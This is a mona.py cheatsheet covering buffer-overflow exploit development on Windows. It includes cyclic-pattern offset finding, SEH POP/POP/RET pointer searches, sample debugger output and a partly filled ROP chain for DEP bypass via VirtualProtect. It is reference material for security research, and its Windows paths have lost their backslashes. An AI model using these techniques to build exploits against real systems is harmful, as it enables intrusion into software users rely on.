A short list of mona.py commands, useful for start to play with her :)

1. ===========================
A LITTLE MONA.PY CHEATSHEET
===========================
Last Modify: 08/12/2011
Author: luca.mella@studio.unibo.it
************************************************************************
*** Configuration ******************************************************
************************************************************************
!mona config -set workingfolder c:logs%p
Set the current working directory. Mona will put output here.
You might use -get alse for retrive current working folder.
(%p means processname)
-cm <option>=true/false
safeseh
aslr
os
rebase
************************************************************************
*** General searching options ******************************************
************************************************************************
-cp <option>,<option>
nonull
unicode 00xx00yy
ascii
asciiprint
upper
lower
uppernum
lowernum
numeric
alphanum
startswithnull 00xxyyzz
-cpb <badchars>
Exclude specified badchars from pointer search
-p <N>
Number of pointers to return
-x <level>
R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specified
access level
************************************************************************
*** Pattern ************************************************************
************************************************************************
!mona pc <size>
Create a cyclic pattern of <size> bytes. Same of "msf_pattern" in metasploit
!mona po <0x4bytes>
find the offset of specified bytes in cyclic pattern

2. ************************************************************************
*** After a crash with cyclic pattern payload **************************
************************************************************************
!mona suggest
Watch for output..
EIP overwritten with normal pattern : 0x37694136 (offset 260)
!!! %EBP+4
ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
EBP overwritten with normal pattern : 0x69413569 (offset 256)
EBX (0x0018f580) points at offset 276 in normal pattern (length 724)
--- output ---
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Looking for cyclic pattern in memory
750F0000 Modules C:WindowsSystem32wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000
bytes)
0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000
bytes)
0BADF00D [+] Examining registers
0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)
0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern
(length 736)
0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)
0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern
(length 724)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack
0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) :
0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) :
0x0018f56c : offset 256, length 744
0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) :
0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) :
0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) :
0x0018f580 : offset 276, length 724
0BADF00D [+] Preparing log file 'exploit.rb'
0BADF00D - (Re)setting logfile C:mona_logsexploit.rb
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
--- end of output ---

3. ************************************************************************
*** Finding things in memory *******************************************
************************************************************************
!mona find
Find a sequence of bytes in memory.
Mandatory argument : -s <pattern> : the sequence to search for.
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : the bottom of the search range
-t <address> : the top of the search range
-c : skip consecutive pointers but show length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
-r <number> : if p2p is used, you can tell the find to also find close
pointers by specifying -r with a value.
This value indicates the number of bytes to step
backwards for each search
!mona find -type instr -s "jmp ebx" -m ntdll.dll
--- output ---
Search into module ntdll.dll
Search for "jmp ebx" as assembly instruction
Result:
0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]
ASLR: True, Rebase: True,
SafeSEH: True, OS: True,
v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll)
--- end of output ---
************************************************************************
*** Assemble instructions **********************************************
************************************************************************
!mona assemble -s "nop"
Return the opcode of specified instructions (chain with '#').
************************************************************************
*** Searching for 'POP/POP/RET' instruction (SEH exploiting) ***********
************************************************************************
!mona seh
Find POP POP RET instruction into program memory.
This statements could be used in SEH exploiting.
--- output ---
0BADF00D [+] Writing results to C:mona_logsseh.txt
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3
0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15
0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6
0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2

4. 0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2
0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1
0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1
[..]
--- end of output ---
************************************************************************
*** ROP based exploit *******************************
************************************************************************
!mona rop -m <NONASLRMODULES>
Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET
sequence), stack pivots, rop functions,
Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD
technique), and suggest wich address
need to be fixed for make it works.
NOTE:
Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list.
Watch "C:mona_logsrop_virtualprotect.txt" for a starting point for
your rop payload (aimed to DEP bypass).
Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permit
to change ESP.
--- output ---
---------- Mona command started on 2011-07-21 10:58:09 ----------
[..]
VirtualProtect register structure (PUSHAD technique)
----------------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (Writable ptr)
EDX = NewProtect (0x40)
EBX = Size
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp -
n -o')
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
VirtualProtect() 'pushad' rop chain
------------------------------------
rop_gadgets =
[
0x00404880, # POP ECX # RETN (server.exe)
0x????????, # <- *&VirtualProtect()
0x00406a48, # MOV EAX,DWORD PTR DS:[ECX]
# ADD EAX,ECX # RETN (server.exe)
0x????????, # ** <- find routine to move
virtualprotect() into esi
# ** Hint : look for
mov [esp+offset],eax and pop esi
0x????????, # couldn't find a pointer to
put ptr to 'jmp esp' into ebp
0x????????, # <- put pointer to payload
here

5. 0x00403e04, # POP EBX # RETN (server.exe)
0x00000201, # <- change size to mark as
executable if needed (-> ebx)
0x00404880, # POP ECX # RETN (server.exe)
0x00409000, # RW pointer (lpOldProtect)
(-> ecx)
0x00404be4, # POP EDI # RETN (server.exe)
0x00404be5, # ROP NOP (-> edi)
0x0040431c, # POP EDX # RETN (server.exe)
0x00000040, # newProtect (0x40) (-> edx)
0x00404a84, # POP EAX # RETN (server.exe)
0x90909090, # NOPS (-> eax)
0x004022e0, # PUSHAD # RETN (server.exe)
# rop chain generated by mona.py
# note : this chain may not work out of the box
# you may have to change order or fix some
gadgets,
# but it should give you a head start
].pack("V*")
[..]
--- end of output ---
===================================================================================
===
Reference:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-
breakfast/